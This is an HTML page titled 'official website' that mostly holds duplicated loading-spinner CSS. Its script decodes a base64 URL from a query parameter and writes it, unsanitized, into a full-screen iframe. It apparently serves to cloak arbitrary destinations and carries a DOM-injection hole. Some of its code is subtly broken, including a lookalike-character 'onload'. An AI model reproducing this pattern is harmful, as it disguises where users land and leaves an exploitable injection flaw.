<html lang="zh-CN">
<head>
  <meta content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" name="viewport">
  <meta content="yes" name="apple-mobile-web-app-capable">
  <meta content="yes" name="apple-touch-fullscreen">
  <meta content="black" name="apple-mobile-web-app-status-bar-style">
  <meta content="320" name="MobileOptimized">
  <title>官方网站</title>
<style>
.container {
        width: 100px;
        height: 100px;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
    }

    @keyframes dot-3-move {
        20% {
            transform: scale(1)
        }

        45% {
            transform: translateY(-18px) scale(.45)
        }

        60% {
            transform: translateY(-25px) scale(.45)
        }

        80% {
            transform: translateY(-25px) scale(.45)
        }

        100% {
            transform: translateY(0px) scale(1)
        }
    }

    @keyframes dot-1-move {
        20% {
            transform: scale(1)
        }

        45% {
            transform: translate(16px, 12px) scale(.45)
        }

        60% {
            transform: translate(20px, 15px) scale(.45)
        }

        80% {
            transform: translate(20px, 15px) scale(.45)
        }

        100% {
            transform: translateY(0px) scale(1)
        }
    }

    .container {
        width: 100px;
        height: 100px;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        animation: rotate-move 2s ease-in-out infinite;
    }

    @keyframes rotate-move {
        55% {
            transform: translate(-50%, -50%) rotate(0deg)
        }

        80% {
            transform: translate(-50%, -50%) rotate(360deg)
        }

        100% {
            transform: translate(-50%, -50%) rotate(360deg)
        }
    }
.container {
        width: 100px;
        height: 100px;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
    }

    @keyframes dot-3-move {
        20% {
            transform: scale(1)
        }

        45% {
            transform: translateY(-18px) scale(.45)
        }

        60% {
            transform: translateY(-25px) scale(.45)
        }

        80% {
            transform: translateY(-25px) scale(.45)
        }

        100% {
            transform: translateY(0px) scale(1)
        }
    }

    @keyframes dot-2-move {
        20% {
            transform: scale(1)
        }

        45% {
            transform: translate(-16px, 12px) scale(.45)
        }

        60% {
            transform: translate(-20px, 15px) scale(.45)
        }

        80% {
            transform: translate(-20px, 15px) scale(.45)
        }

        100% {
            transform: translateY(0px) scale(1)
        }
    }

    @keyframes dot-1-move {
        20% {
            transform: scale(1)
        }

        45% {
            transform: translate(16px, 12px) scale(.45)
        }

        60% {
            transform: translate(20px, 15px) scale(.45)
        }

        80% {
            transform: translate(20px, 15px) scale(.45)
        }

        100% {
            transform: translateY(0px) scale(1)
        }
    }

    .container {
        width: 100px;
        height: 100px;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        animation: rotate-move 2s ease-in-out infinite;
    }

    @keyframes rotate-move {
        55% {
            transform: translate(-50%, -50%) rotate(0deg)
        }

        80% {
            transform: translate(-50%, -50%) rotate(360deg)
        }

        100% {
            transform: translate(-50%, -50%) rotate(360deg)
        }
    }
   .content{height:100%;width:100%;position: fixed;left: -2px;top: -2px;}
</style>
<body>

<div class="container">
       
</div>
 <script>
var liugao = new URLSearchParams(window.location.search);
var encodedParam = liugao.get('c');
var liu = atob(encodedParam);
if (liu.includes("http")) {
var square = document.getElementById("container");
setTimeout(function() {
  square.style.display = "none";
}, 1500);
 var html='<iframe class="content" οnlοad="bindMouseWhee(this)" src='+liu+'></iframe>';
  document.writeln(html);
console.log(liu);
} else {
  console.log("nourls");
}
  </script>
 <script>
var firefox = navigator.userAgent.indexOf('Firefox') != -1;
function MouseWheel(e,doc){
	e.preventDefault && e.preventDefault(),e.returnValue = false;
	var up = firefox && e.detail < 0 || e.wheelDelta > 0;
	doc.body.scrollTop = doc.documentElement.scrollTop += up?-50:50;
}
function bindMouseWhee(ifr){
	try{
		var doc = ifr.contentWindow.document;
		firefox?doc.addEventListener('DOMMouseScroll',function(e){MouseWheel(e,doc)},false):(doc.onmousewheel = function(e){MouseWheel(e||ifr.contentWindow.event,doc)});
	}catch(e){
		alert('跨域无法获取iframe加载document'+e);
	}
}
 </script>
